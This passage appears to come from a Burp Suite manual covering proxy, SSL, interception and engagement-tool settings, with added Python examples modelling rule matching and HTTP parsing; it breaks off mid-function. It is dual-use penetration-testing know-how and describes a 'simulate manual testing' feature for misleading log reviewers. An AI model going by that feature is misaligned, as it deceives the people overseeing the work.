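from dataclasses import dataclass
from fnmatch import fnmatchcase
from typing import Optional


@dataclass
class ProxyRule:
    destination: str                  # wildcard pattern for the destination host
    proxy_host: Optional[str]         # None means connect directly
    proxy_port: int = 0
    auth_type: Optional[str] = None   # "basic", "NTLMv1", "NTLMv2" or "digest" if needed
    domain: Optional[str] = None      # only consulted for NTLM


# What Burp does when no rule matches: a direct, non-proxied connection.
DIRECT = ProxyRule("(no rule matched)", None)

# Constructed reproduction of the configuration described in the text.
# Proxy hostnames, ports and the NTLM domain are assumptions.
RULES = [
    ProxyRule("staging.intranet.corp.com", None),
    ProxyRule("*.intranet.corp.com", "proxy.intranet.corp.com", 8080),
    ProxyRule("*", "gateway.corp.com", 3128, auth_type="NTLMv2", domain="CORP"),
]


def select_route(host, rules):
    """Rules are tried in order; the first whose pattern matches the destination wins."""
    host = host.lower()
    for rule in rules:
        if fnmatchcase(host, rule.destination.lower()):
            return rule
    return DIRECT


def shadowed_rules(rules):
    """Indices of rules that can never be selected because an earlier rule already
    matches every host they describe. The test is a heuristic: the later pattern,
    taken literally, is matched against each earlier pattern. That is exact for
    literal hosts and for the catch-all '*', though not for every pair of wildcards."""
    shadowed = []
    for i, rule in enumerate(rules):
        if any(fnmatchcase(rule.destination.lower(), earlier.destination.lower())
               for earlier in rules[:i]):
            shadowed.append(i)
    return shadowed
```

Putting the catch-all `*` rule first would silently send the staging and intranet traffic through the authenticated gateway; `shadowed_rules` reports exactly that misordering, which is a useful check before saving a configuration that other team members will reuse.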

These settings control what types of redirection Burp will recognise and attempt to follow where applicable. The redirection targets which Burp will actually follow are still determined by the configuration within each individual tool (e.g. based on target scope).

These settings determine timeouts for various network tasks. The "normal" setting is used for most network communications, and determines how long Burp Suite will wait before abandoning an individual request and recording that a timeout has occurred. The "read until close" setting is only used where a response is being processed which does not contain a Content-Length or Transfer-Encoding HTTP header. In this situation, Burp Suite waits for the specified interval before determining that the transmission has been completed. The "domain name resolution" setting determines how often Burp Suite will re-perform successful domain name look-ups. This should be set to a suitably low value if target host addresses are frequently changing. The "failed domain name resolution" setting determines how often Burp Suite will reattempt unsuccessful domain name look-ups.

These settings enable you to specify hostname-to-IP mappings which override the DNS resolution provided by the operating system. This feature can be used to ensure correct onward forwarding of requests when the hosts file has been modified to perform invisible proxying of traffic from non-proxy-aware thick client components.

These options control the handling of HTTP 100 Continue responses from servers. These often occur when a POST request is sent to the server, and it makes an interim response before the request body has been transmitted. If "understand 100 Continue responses" is checked, Burp Suite will skip the interim response and parse the real response headers for response information like status code and content type. If "remove 100 Continue headers" is checked, Burp Suite will remove any interim headers from the server's response before this is passed to individual tools.
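As an added illustration of what those two options mean on the wire (example code, not Burp's implementation and not from this book), the following Python takes the raw bytes a server might send for a POST, skips any leading interim response so that the real status line and headers are the ones parsed, and optionally strips the interim block before the message is passed on. It treats any 1xx status as interim, which generalises slightly beyond the 100 Continue case the text describes; the sample bytes and the function names are constructed.

```python
def _split(raw):
    """Split at the first blank line into (head, remainder)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    return head, rest


def _status_code(head):
    """Status code from a status line such as b'HTTP/1.1 100 Continue'; None if malformed."""
    fields = head.split(b"\r\n", 1)[0].split(b" ", 2)
    if len(fields) < 2 or not fields[1].isdigit():
        return None
    return int(fields[1])


def _header(head, name):
    """Case-insensitive lookup of one header value in a header block, or None."""
    for line in head.split(b"\r\n")[1:]:
        key, sep, value = line.partition(b":")
        if sep and key.strip().lower() == name.lower():
            return value.strip().decode("iso-8859-1")
    return None


def handle_server_response(raw, understand_100=True, remove_100=True):
    """Model of the two options. Returns the status code and content type the tools
    will see, the bytes passed on to them, and how many interim responses were skipped.
    Any 1xx response is treated as interim (an extension of the 100 Continue case)."""
    interim = 0
    remaining = raw
    if understand_100:
        # Skip every leading 1xx block so the real headers are the ones parsed.
        while True:
            head, rest = _split(remaining)
            code = _status_code(head)
            if code is None or not 100 <= code < 200:
                break
            interim += 1
            remaining = rest
    head, _ = _split(remaining)
    return {
        "status": _status_code(head),
        "content_type": _header(head, b"content-type"),
        # Without "remove", the interim headers stay in what the tools receive.
        "passed_on": remaining if remove_100 else raw,
        "interim_skipped": interim,
    }


# Constructed server bytes: an interim 100 Continue followed by the real response.
RAW = (b"HTTP/1.1 100 Continue\r\n\r\n"
       b"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nContent-Length: 15\r\n\r\n"
       b'{"status":"ok"}')
```

With both options off, a naive parser reports status 100 and no content type for this exchange, which is why tools that key on status codes (a scanner deciding whether a payload "worked", a display filter on 2xx responses) mis-classify such responses unless the interim block is understood first.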

Sessions tab

This tab allows you to configure Burp's session handling and macro capabilities. For more information about making use of these features, see the session handling help.

Display tab

This tab contains options controlling how Burp displays HTTP requests and responses.

These settings control the font which is used to display HTTP messages, and whether syntax highlighting is performed for requests and responses.

These settings control how Burp handles character sets when displaying HTTP requests and responses. By default, charsets are automatically recognised and correctly rendered, per response. This avoids the need to set a specific charset on the command line when starting Burp, and allows you to work with content that uses multiple different charsets within the same instance of Burp. You can override this default behaviour and set a specific charset, or tell Burp to display raw bytes with no charset handling, in the above options.

Note that some charsets are not supported for all fonts. If you are using a charset that employs non-Latin glyphs, you should first try using a system font such as Courier New or Dialog.

Anywhere HTTP responses are displayed within Burp Suite, it is possible to render HTML content as it would appear within your browser. This option controls whether Burp Suite will make any additional HTTP requests that are required to fully render HTML content (for example, for embedded images). Use of this option involves a trade-off between the speed and the quality of HTML rendering performed by Burp Suite.

SSL tab

This tab contains options for how SSL should be used, and information about the SSL certificates presented by destination servers.

This option enables you to configure a client SSL certificate (in PKCS12 format) which will be used whenever a destination HTTPS server requires client certificate authentication. You can also configure Burp to allow unsafe renegotiation, which is apparently necessary when using some client certificates. Sometimes, you may have difficulty negotiating SSL connections with certain web servers. The Java SSL stack contains a few gremlins, and fails to work with certain unusual server configurations. To help you troubleshoot this problem, Burp lets you specify which protocols should be offered to servers during SSL negotiations.

Note that Burp itself implements a few workarounds for SSL issues, and if a negotiation fails with the protocols you have configured, Burp will still try some alternative combinations of protocols which often work. So you shouldn't use this feature as a method of testing which protocols are actually supported by the server.

You can also configure Burp to enable all supported cipher suites during SSL negotiation. This option is not normally necessary but may be useful when attempting to connect to unusually configured SSL stacks.

This information-only panel contains details of all X509 certificates received from destination web servers. Double-click an item in the table to display the full details of the certificate.

Misc tab

This tab contains miscellaneous settings regarding logging, backup, location of temporary files, and scheduled tasks.

These settings control logging of network requests and responses. Logging can be configured per-tool or for all Burp Suite traffic.

[Pro version] These settings let you configure Burp to save a backup of all tools' state and configuration in the background at a configurable interval, and also optionally on exit. This setting persists across reloads of Burp. So you can configure Burp to always save its state to a local temp directory, and know that every time you use Burp you will have a backup copy of your work.

These options let you configure the directory path where Burp saves its temporary files. This allows you to specify a directory on a different volume, or which is not world-readable, if required. Changes to this setting take effect the next time Burp starts up.

[Pro version] You can use the task scheduler to automatically start and stop certain tasks at defined times and intervals. For example, the configuration shown above will begin scanning a target overnight at 2am, and suspend the scanner each day during working hours.

You can create tasks via the context menus which appear throughout Burp, or using the "new task" button in the above panel. This action starts a wizard which lets you configure the details and timing of the task. Various different types of task are available: You can configure each task to be one-off, or to repeat at regular intervals.

Engagement tools

[Pro version] A number of tools exist to help make your work faster and more effective. These can be accessed via the context menus which appear throughout Burp:

Search

See search help.

Note that if you initiate a search from within the target site map (as opposed to the Burp menu), then the search will be specific to the selected branch(es) of the site map.

Find comments and scripts

You can use these functions to search part or all of the site map for scripts and comments. The search results window shows responses from all Burp tools containing either scripts or comments. Selecting an individual item shows the full request and response in a preview pane, with relevant items automatically highlighted, and also extracted into their own tab: You can use the "export" button to save all of the scripts or comments to file or to the clipboard, optionally consolidating duplicated items.

Find references

Anywhere you see an HTTP request, URL, domain, etc., you can use the "find references" function to search all of Burp's tools for HTTP responses which link to that item. The search results window shows responses from all Burp tools which link to the selected item. When you view an individual search result, the response is automatically highlighted to show where the linking reference occurs: Note that this feature treats the original URL as a prefix when searching for links, so if you select a host, you will find all references to that host; if you select a folder, you will find all references to items within that folder or deeper.

The new "find references" feature effectively serves the same purpose as the "linked from" list that existed in earlier versions of Burp Spider, but is much more powerful.
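The prefix semantics described above (select a host to find every reference to it, select a folder to find references to anything within it) can be modelled in a few lines. The following Python is an added example, not Burp's own code and not from this book: it extracts link attributes from stored responses, resolves relative and protocol-relative references against the page they came from, and compares parsed URL components rather than raw string prefixes, so a look-alike host such as `app.example.test.attacker.test` is not reported as a reference to `app.example.test`. The responses, hostnames and function names are constructed assumptions.

```python
import re
from urllib.parse import urljoin, urlsplit

# href/src/action attributes, quoted or bare. A deliberately simple tokeniser, not an HTML parser.
LINK_ATTR = re.compile(r"""\b(?:href|src|action)\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def extract_links(page_url, body):
    """Yield (absolute_url, offset_in_body) for every link attribute, resolving
    relative and protocol-relative references against the page's own URL."""
    for m in LINK_ATTR.finditer(body):
        yield urljoin(page_url, m.group(1)), m.start(1)


def refers_to(target, link):
    """A host target matches every URL on that host; a folder target matches the
    folder itself and anything beneath it. Compared on parsed components, so a
    hostname that merely starts with the target's hostname does not match."""
    t, l = urlsplit(target), urlsplit(link)
    if (t.scheme, t.hostname, t.port) != (l.scheme, l.hostname, l.port):
        return False
    base = t.path.rstrip("/")
    if not base:
        return True
    return l.path == base or l.path.startswith(base + "/")


def find_references(target, responses):
    """responses: list of (page_url, body). Returns (page_url, linked_url, offset)
    for each reference; the offset is where a viewer would highlight the link."""
    hits = []
    for page_url, body in responses:
        for link, offset in extract_links(page_url, body):
            if refers_to(target, link):
                hits.append((page_url, link, offset))
    return hits


# Constructed responses (assumed hosts and content), as a Burp tool might have stored them.
RESPONSES = [
    ("https://app.example.test/index.html",
     '<a href="/admin/">Admin</a><img src="/static/logo.png">'
     '<script src="https://cdn.example.test/lib.js"></script>'),
    ("https://app.example.test/help/",
     '<a href="../admin/users">User list</a><form action="search" method="get">'),
    ("https://other.example.test/",
     '<a href="https://app.example.test.attacker.test/admin/">look-alike host</a>'
     '<script src="//cdn.example.test/lib.js"></script>'),
]
```

Selecting the `/admin` folder finds both the link on the index page and the `../admin/users` reference on the help page, while the look-alike host on the third page is ignored; selecting the `cdn.example.test` host finds both script includes, including the protocol-relative one, which is the kind of third-party dependency worth listing when reviewing what an application loads.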

Analyse target

This function can be used to analyse a target web application and tell you how many static and dynamic URLs it contains, and how many parameters each URL takes. This can help you assess how much effort a penetration testing engagement is likely to involve, and can help you decide where to focus your attention during the test itself.

To access this feature, select one or more hosts or branches within the site map, and launch it using the context menu. The summarised information looks like this: And you can drill down into more detail about individual URLs:

You can also export all of this information as an HTML report, which you can attach to client proposals and reports to show the attack surface you have covered.

Note: (i) This function only analyses the content already captured within the site map, so you should ensure that you have fully browsed or spidered all of the application's content and functionality before running it. (ii) URLs are deemed to be "static" if they do not take any parameters in the URL or message body; however the responses from these URLs may still be dynamically generated by the application.

Discover content

You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.

Burp uses various techniques to discover content, including name guessing, web spidering, and extrapolation from naming conventions observed in use within the application. The feature is highly configurable, as shown by the available options which are explained below:

Target - These options control which directory to begin discovery from. Only items within this path and its subdirectories will be requested during the session. You can choose to discover files or directories or both, and how deep to recurse into discovered subdirectories.

Test case generation - These options control which file and directory names Burp will use when making requests to discover content. As well as built-in lists, Burp can harvest names used elsewhere within an application, and retry them at other locations, and can construct names based on discovered items, for example by cycling values in filenames containing numbers.

File extensions - You can specify a list of file extensions with which to test each possible filename. Burp can harvest file extensions observed in use within the application, and test these with every filename. When a file has been confirmed, Burp can also try a specific list of variant extensions with that filename, for example to check for old or backup versions of the same file.

Discovery engine - You can control how many threads are used for content discovery and spidering, whether file names are handled case sensitively, and how the discovery session interacts with Burp's main site map (in the target tab of the suite).

When you have configured your discovery session, you can start it from the control tab, which also provides runtime information about the actions being performed. The work is divided into numerous discrete tasks, which are prioritised according to their likelihood of quickly discovering new content, and new tasks are generated recursively as content is confirmed: The discovery session employs its own site map, showing all of the content which has been discovered within the defined scope. If you have configured Burp to do so, newly discovered items will also be added to Burp's main site map.

Schedule task

See task scheduler help.

Simulate manual testing

This feature won't exactly enhance your productivity, but you may sometimes find it useful nonetheless. You can use it to make Burp simulate manual testing activities, by sending common test payloads to random URLs and parameters within a target application, at irregular intervals. Burp doesn't do anything with the responses, so you won't find out about any bugs in this way. But if you think that someone might be reviewing the application's logs to confirm that you are working, you can use this feature while you nip out for a long lunch, gym session, drinking binge, or whatever happens to be your preferred diversion.

Easter Eggs, anyone?

Message editor

Throughout Burp, a custom text editor is used which is optimised for viewing and editing HTTP requests and responses. Request and response syntax is automatically colourised to highlight interesting items. Mouse-over pop-ups perform automatic URL decoding (for requests) and HTML decoding (for responses).

The following shortcut keys are available:

- Ctrl + A, select all
- Ctrl + X, cut selected text
- Ctrl + C, copy selected text
- Ctrl + V, paste
- Ctrl + F, find and highlight the selected text throughout the message
- Ctrl + Z, undo last edit
- Ctrl + Y, redo last undone edit
- Ctrl + U, URL-encode selected text (hold down Shift to decode)
- Ctrl + H, HTML-encode selected text (hold down Shift to decode)
- Ctrl + B, Base64-encode selected text (hold down Shift to decode)
- Ctrl + left, move to previous word
- Ctrl + right, move to next word
- Ctrl + up, move to previous paragraph
- Ctrl + down, move to next paragraph
- Ctrl + home, go to start of message
- Ctrl + end, go to end of message
- Ctrl + backspace, delete previous word
- Ctrl + del, delete next word

Right-clicking on any request or response produces a context menu that can be used to perform various actions:

 send to - You can send any message, or a selected portion of the message, to other tools within Burp Suite, to perform further attacks or analysis.
 show response in browser - You can use this to render the selected response in your browser, to avoid the limitations of Burp's built-in HTML renderer. When you select this option, Burp gives you a unique URL which you can paste into your browser (configured to use the current instance of Burp as its proxy), to render the response. The resulting browser request is served by Burp with the exact response that you selected (the request is not forwarded to the original web server), and yet the response is processed by the browser in the context of the originally requested URL. Hence, relative links within the response will be handled properly by your browser. As a result, your browser may make additional requests (for images, CSS, etc.) in the course of rendering the response - these will be handled by Burp in the usual way.
 request in browser - You can use this to re-issue the selected request in your browser (configured to use the current instance of Burp as its proxy), and optionally re-issue the request within the current browser session (i.e. using the cookies supplied by the browser's cookie JAR). You can use this feature to facilitate testing of access controls, by selecting requests within Burp that were generated within one user context (e.g. an administrator), and reissuing the requests within a different user context that you are now logged in as (e.g. an ordinary user). When you are dealing with complex, multi-stage processes, this methodology, of manually pasting a series of URLs from Burp into your browser, is normally a lot easier than repeating a multi-stage process over and over, and modifying cookies manually using the proxy.
 find references - [Pro version] You can use this function to search all of Burp's tools for HTTP responses which link to the selected item.
 discover content - [Pro version] You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.
 schedule task - [Pro version] You can use this function to create tasks which will run automatically at defined times and intervals.
 change request method - For requests, you can automatically switch the request method between GET and POST, with all relevant request parameters suitably relocated within the request. This option can be used to quickly test the application's tolerance of parameter location in potentially malicious requests (e.g. cross-site scripting).
 change body encoding - For requests, you can switch the encoding of any message body between application/x-www-form-urlencoded and multipart/form-data.
 copy URL - This function copies the full current URL to the clipboard.
 copy to file - This function allows you to select a file and copy the contents of the message to the file. This is handy for binary content, when copying via the clipboard may cause problems. Copying operates on the selected text or, if nothing is selected, the whole message.
 paste from file - This function allows you to select a file and paste the contents of the file into the message. This is handy for binary content, when pasting via the clipboard may cause problems. Pasting replaces the selected text or, if nothing is selected, inserts at the cursor position.
 save item - This function lets you specify a file to save the selected request and response in XML format, including all relevant metadata such as response length, HTTP status code and MIME type.
 convert selection - These functions enable you to perform quick encoding or decoding of the selected text in a variety of schemes.
 URL-encode as you type - If this option is turned on then characters like & and = will be automatically replaced with their URL-encoded equivalents as you type.

Extensibility

Burp Suite is extensible via the IBurpExtender interface. This allows third-party developers to extend the functionality of Burp by creating implementations of the interface which will be dynamically loaded and executed. Extensions can perform a wide range of functions, including processing and modifying HTTP requests made via all Burp tools, issuing arbitrary HTTP requests via Burp, extending Burp's UI with custom menu items, querying and modifying Burp's configuration data, and accessing key runtime information, including the Proxy history, site map and Scanner issues. See the source code and Javadoc for the interface for more details.

I think if you have gone through the manual you are ready to hack. But wait, there is so much to offer.

What is Burp Proxy?

Burp Proxy is an interactive HTTP/S proxy server for attacking and debugging web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.

Burp Proxy allows you to find and exploit application vulnerabilities by monitoring and manipulating critical parameters and other data transmitted by the application. By modifying browser requests in various malicious ways, Burp Proxy can be used to perform attacks such as SQL injection, cookie subversion, privilege escalation, session hijacking, directory traversal and buffer overflows. Intercepted traffic can be modified as raw text, as a table of parameters or headers, or in hexadecimal form, so even transfers of binary data can be manipulated. Response messages containing HTML or image data can be rendered within Burp Proxy.

In addition to per-request manipulation, Burp Proxy maintains a complete history of every request sent by the browser, all modifications made, and all responses received. You can review earlier requests, and reissue and re-modify any individual request, and view saved responses in raw form or rendered as web pages. The entire conversation in both directions can also be logged to file for further analysis or to provide an audit trail.

Burp Proxy is tightly integrated with the other tools within Burp Suite, and allows any request or response to be sent to other tools for further processing. With a single click, you can send an interesting request to be used as the basis for session token analysis, manual modification and reissue, vulnerability analysis, or a custom automated attack using Burp Intruder.

The interactive behaviour of Burp Proxy can be controlled using fine-grained rules for requests and responses, based on domain, IP address, protocol, HTTP method, URL, resource type, parameters, cookies, header/body content, response code, content type and HTML page title. It can be configured to operate quietly without any per-request interaction. You can later review the history to identify requests that bear closer examination. Burp Proxy can be used to automate modification of HTTP request and response messages, through the use of regex-based match and replace rules.

In addition to the main user interface, Burp Proxy can also be controlled from within the end browser, for reviewing the request history and reissuing individual requests. Burp Proxy can be used in conjunction with an upstream proxy server. It can handle basic, NTLM and digest authentication to the upstream proxy and to web servers, and so can be used in almost any LAN environment. It supports SSL (with the ability to configure custom server or client certificates), and allows HTTPS traffic to be viewed and modified as clear-text. In addition, it automatically handles various encodings of server responses, including chunked transfer-encoding and compressed content-encoding.

Using Burp Proxy

When Burp Proxy is launched, the HTTP/S proxy service is started automatically on port 8080 of the loopback interface only. To start using Burp Proxy, simply configure your browser to use a proxy server on 127.0.0.1:8080, and begin browsing.

By default, Burp Proxy is configured to intercept requests for non-media resources, and display these for inspection and modification. Other requests (for images and stylesheets) and all server responses are automatically forwarded. This default behaviour can be modified (see Options tab).

Intercept tab

This tab is used to display and modify individual browser requests and server responses.

The top of the display indicates whether the HTTP message shown is a request or response, and the hostname and IP address of the target server. When you have reviewed and (if required) edited the message, click "forward" to send it on to the server or browser. Click "drop" to abandon the message. You can also forward or drop the message using the shortcut keys Alt-F and Alt-D.

Each request and response message can be displayed and analysed in various forms, by clicking on one of the available display tabs. The available tabs will appear and disappear as appropriate for the type of message being displayed:

 raw - This displays the message in plain text form. At the bottom of the text pane is a search and highlight function which can be used to quickly locate interesting strings within the message, such as error messages. An options pop-up on the left of the search bar lets you control case sensitivity, and whether to use simple text or regex search.
 params - For requests containing parameters (within the URL query string, the Cookie header, or the message body), this tab analyses the parameters into name/value pairs and allows these to be easily viewed and modified.
 headers - This shows the HTTP headers of the message as name/value pairs, and also displays any message body in raw form.
 hex - This allows direct editing of the raw binary data that make up the message. Certain types of traffic (e.g. browser requests with MIME-encoded parts) contain binary content that may be corrupted if modified in the text editor. To modify this type of message, the hex editor should be used.
 HTML / XML - For responses containing content in these formats, this provides a syntax-colourised view of the message body.
 render - For responses containing HTML or image content, this renders the content in visual form, as it would appear within your browser.
 AMF - For requests and responses in Action Message Format, this displays a tree view of the decoded message. If editable, you can double-click individual nodes in the tree to modify their values.
 viewstate - For requests and responses containing an ASP.NET ViewState parameter, this deserialises the contents of the ViewState, enabling you to review the data contained for any sensitive items. It also indicates whether the ViewState MAC option is enabled (and therefore whether the ViewState can be modified).

Right-clicking on any of the display tabs produces a context menu that can be used to perform various actions. The same menu can also be accessed via the "action" button on the main display:

 send to - You can send any message, or a selected portion of the message, to other tools within Burp Suite, to perform further attacks or analysis.
 find references - [Pro version] You can use this function to search all of Burp's tools for HTTP responses which link to the selected item.
 discover content - [Pro version] You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.
 schedule task - [Pro version] You can use this function to create tasks which will run automatically at defined times and intervals.
 change request method - For requests, you can automatically switch the request method between GET and POST, with all relevant request parameters suitably relocated within the request. This option can be used to quickly test the application's tolerance of parameter location in potentially malicious requests (e.g. cross-site scripting).
 change body encoding - For requests, you can switch the encoding of any message body between application/x-www-form-urlencoded and multipart/form-data.
 copy URL - This function copies the full current URL to the clipboard.
 copy to file - This function allows you to select a file and copy the contents of the message to the file. This is handy for binary content, when copying via the clipboard may cause problems. Copying operates on the selected text or, if nothing is selected, the whole message.
 paste from file - This function allows you to select a file and paste the contents of the file into the message. This is handy for binary content, when pasting via the clipboard may cause problems. Pasting replaces the selected text or, if nothing is selected, inserts at the cursor position.
 save item - This function lets you specify a file to save the selected request and response in XML format, including all relevant metadata such as response length, HTTP status code and MIME type.
 don't intercept - These commands allow the quick addition of interception rules (see Options tab) to prevent interception of messages which share features of the currently displayed message (e.g. remote host, resource type, response code).
 do intercept - Available for requests only, this allows you to force interception for the response to the currently displayed request.
 convert selection - These functions enable you to perform quick encoding or decoding of the selected text in a variety of schemes.
 URL-encode as you type - If this option is turned on then characters like & and = will be automatically replaced with their URL-encoded equivalents as you type.

The intercept tab contains a toggle button which can be used to quickly turn interception mode on and off. If this is showing "intercept is on" then messages will be intercepted or automatically forwarded according to the interception rules configured on the Options tab. If this is showing "intercept is off" then no messages will be intercepted.

Options tab

This tab contains various configuration options which control the behaviour of Burp Proxy, as described below.

Burp Proxy allows you to define multiple listeners. Each listener opens a port on your computer and waits for connections from your browser. By default, Burp opens a single listener on port 8080 of the loopback interface, but you can modify this listener and add as many others as you require. For each listener, you can configure a number of properties, as described below.

local listener port - This is the port on the local computer which will be opened to listen for incoming connections. You should configure your browser settings to use the host 127.0.0.1 and this port as its proxy server.

listen on loopback interface only - This controls whether the listener binds only to the loopback interface (127.0.0.1) or to all network interfaces. Note: if this option is deselected then other computers may be able to connect to the listener. This may enable them to initiate outbound connections originating from your IP address, and to access the contents of the proxy history, which may contain sensitive data such as login credentials. You should only deselect this option when you are located on a trusted network.

support invisible proxying for non-proxy-aware clients - If you are using a standard browser, you should leave this option unchecked. The option is sometimes useful if the application you are targeting employs a thick client component which runs outside of the browser, or which makes its own HTTP requests outside of the browser's framework. Often, these clients don't support HTTP proxies, or don't provide an easy way to configure them to use one. In this situation, you can effectively force the client to connect to Burp by redirecting the client's requests lower down the networking stack - e.g. by adding an entry to your hosts file, or changing your routing configuration. However, the requests issued by the client will probably not be in the style normally used with web proxies.

A proxy-style request looks like this:

GET http://myapp.com/foo.php HTTP/1.1
Host: myapp.com

whereas the corresponding non-proxy request looks like this:

GET /foo.php HTTP/1.1
Host: myapp.com

Normally, web proxies need to receive the full URL in the first line of the request in order to determine which destination host to forward the request to (they do not, if they follow the spec, look at the Host header to determine the destination). To enable Burp Proxy to work with clients that send non-proxy-style requests, you need to check the "support invisible proxying" option. When you do this, if Burp receives any non-proxy-style requests, it will parse out the contents of the Host header, and use that as the destination host for that request.

redirect to host/port - You should normally leave these options blank. If they are configured, Burp Proxy will forward every request to the host and port specified, regardless of the target requested by the browser. Note that if you are using this option, it may be necessary to configure a match/replace rule to rewrite the Host header in requests, if the server to which you are redirecting requests expects a Host header that differs from the one sent by the browser.

server SSL certificate - This option lets you configure the server SSL certificates that are presented to your browser. Correct use of these options can resolve some SSL issues that arise when using an intercepting proxy. See the server SSL certificates help for full details of how to use these options.

Note: By default, upon installation, Burp creates a unique, self-signed CA certificate, and stores this on your computer to use every time Burp is run. Each time you connect to an SSL-protected website, Burp generates a server certificate for that host, signed by the CA certificate. To make most effective use of this feature, you can install Burp's CA certificate as a trusted root in your browser (see instructions), so that the per-host certificates are accepted without any alerts.

Sometimes, you may wish to create a custom SSL certificate to use within Burp. You can use the following commands in OpenSSL to create a custom certificate (called "foo.crt") with a name of your choosing:

openssl genrsa 1024 > foo.key
openssl req -new -x509 -nodes -sha1 -days 7300 -key foo.key > foo.crt
openssl pkcs12 -export -out foo.p12 -in foo.crt -inkey foo.key -name "your name"

These panels allow fine-grained interception rules to be configured governing the interception of requests and responses. The "intercept if" checkboxes control whether any requests and responses at all are intercepted. If one or both of these boxes are checked, then the relevant messages will be intercepted according to the active rules in the table. Individual rules can be activated or deactivated with the checkbox on the left of each rule. Rules can be edited, removed, added or relocated using the buttons on the right.

Rules can be configured on practically any attribute of the message, including domain name, IP address, protocol, HTTP method, URL, resource type, parameters, cookies, header/body content, response code, content type and HTML page title. You can configure rules to only intercept items for URLs that are within the target scope. Regular expressions can be used to define complex matching conditions for each attribute. Rules are combined using the Boolean operators AND and OR. These are processed with a simple "left to right" logic in which the scope of each operator is as follows:

(cumulative result of all prior rules) AND/OR (result of current rule)

All active rules are processed on every message, and the result after the final active rule is applied determines whether the message is intercepted or forwarded in the background.
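The left-to-right AND/OR combination just described, as an added Python example (my own code, not Burp's). The rule attributes and the three sample messages are constructed stand-ins; the point to notice is that a trailing OR rule can override every rule before it, because there is no precedence between AND and OR.

```python
"""Left-to-right evaluation of Burp Proxy-style interception rules.

Added example, not Burp's own code. It models only the combination logic
the text describes: every active rule is applied in order and folded into
the running result as
    (cumulative result of all prior rules) AND/OR (result of current rule)
with no precedence between AND and OR. Rule attributes are simplified
stand-ins for Burp's (domain, method, file extension, ...), and the
sample messages below are constructed for the demonstration.
"""
import re
from dataclasses import dataclass


@dataclass
class Rule:
    active: bool          # the checkbox on the left of each rule
    operator: str         # "AND" or "OR"; ignored for the first active rule
    attribute: str        # message attribute to test, e.g. "domain"
    pattern: str          # regular expression, as in Burp's rule editor
    negate: bool = False  # "does not match" variant of the rule

    def matches(self, message: dict) -> bool:
        value = str(message.get(self.attribute, ""))
        hit = re.search(self.pattern, value) is not None
        return (not hit) if self.negate else hit


def evaluate(rules, message):
    """Fold the active rules left to right.

    Returns (intercept, trace); trace lists, per active rule, the rule's
    own result and the cumulative result after applying it. With no
    active rule nothing is intercepted (an assumption made for this
    example; the text does not state Burp's behaviour in that case).
    """
    cumulative = None
    trace = []
    for rule in rules:
        if not rule.active:
            continue                      # deactivated rules are skipped
        current = rule.matches(message)
        if cumulative is None:
            cumulative = current          # first active rule seeds the result
        elif rule.operator == "AND":
            cumulative = cumulative and current
        elif rule.operator == "OR":
            cumulative = cumulative or current
        else:
            raise ValueError(f"unknown operator {rule.operator!r}")
        trace.append((rule.attribute, current, cumulative))
    return (bool(cumulative) if cumulative is not None else False), trace


def should_intercept(rules, message, intercept_if=True):
    """Final decision: the "intercept if" checkbox is the master switch,
    then the result after the last active rule decides."""
    if not intercept_if:
        return False
    return evaluate(rules, message)[0]


# Rules shaped like Burp's defaults (in-scope host, skip media files),
# with an OR rule appended. Left to right this reads
# ((domain matches AND extension is not media) OR method is POST).
RULES = [
    Rule(True, "AND", "domain", r"^app\.example$"),
    Rule(True, "AND", "extension", r"^(gif|jpg|png|css|js)$", negate=True),
    Rule(True, "OR", "method", r"^POST$"),
    Rule(False, "AND", "status", r"^5\d\d$"),   # inactive, never consulted
]

# Constructed sample messages (attribute dicts, not real traffic).
PAGE = {"domain": "app.example", "extension": "php", "method": "GET"}
IMAGE = {"domain": "app.example", "extension": "png", "method": "GET"}
# A POST for an image on another host: rules 1 and 2 both fail, but the
# trailing OR rule flips the cumulative result, so it is intercepted.
# Under ordinary precedence, A AND (B OR C), it would be forwarded.
FOREIGN_POST = {"domain": "cdn.other", "extension": "png", "method": "POST"}

if __name__ == "__main__":
    for name, msg in [("page", PAGE), ("image", IMAGE), ("foreign post", FOREIGN_POST)]:
        decision, trace = evaluate(RULES, msg)
        print(f"{name:13}: {'intercept' if decision else 'forward'}  {trace}")
```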

The "update Content-Length" checkboxes control whether Burp Proxy automatically updates the Content-Length header of requests and responses when these have been modified by the user. If checked, Burp Proxy will recalculate the length of the HTTP body of the modified message, and set the correct value in the HTTP header. This feature is normally essential when the HTTP body has been modified. The HTTP specification, and most web servers, require the correct value for the length of the HTTP body to be submitted in the Content-Length header. If the correct value is not specified, then the server or browser receiving the message may generate an error, process an incomplete message, or may wait indefinitely for further data to be received.

You can use these options to achieve various tasks by automatically rewriting the HTML in application responses. Unhiding hidden fields enables you to edit their values directly in the browser, rather than by intercepting subsequent requests. Similarly with enabling disabled fields, and removing length limitations. Disabling JavaScript and OBJECT tags provides a quick way to disable any client-side logic for testing purposes. (Note that this feature is not designed to be used as a security defence in the manner of NoScript.)

match and replace - These options configure Burp Proxy to perform regex-based pattern matching and replacement on HTTP request and response headers and body. For each rule selected, a regular expression is used to test the header or body for matches, and any matching parts are replaced with the specified string.

For message headers, if the test matches the entire header and the replacement string is left blank, then the header is deleted. If a blank matching expression is specified, then the replacement string will be added as a new header. This feature is useful to automate certain application attacks, such as manipulation of cookies or URL query string fields.
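The proxy-style versus non-proxy-style request handling, the header match/replace semantics (delete on a whole-header match with a blank replacement, add on a blank match expression) and the Content-Length recalculation, worked through together in one added Python example (my own code, not Burp's). It assumes a plaintext listener when a non-proxy-style request has no port in its Host header, and the sample requests are constructed.

```python
"""A minimal intercepting-proxy request pipeline: decide where a request
goes, rewrite headers with match/replace rules, then fix Content-Length.

Added example, not Burp's own code. Implements three behaviours the text
describes: routing from an absolute URL (proxy-style) or from the Host
header (invisible proxying), header match/replace with delete/add rules,
and Content-Length recalculation after a body edit. Samples constructed.
"""
import re
from urllib.parse import urlsplit


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request_line, headers, body);
    headers is a list of (name, value) pairs in their original order."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = []
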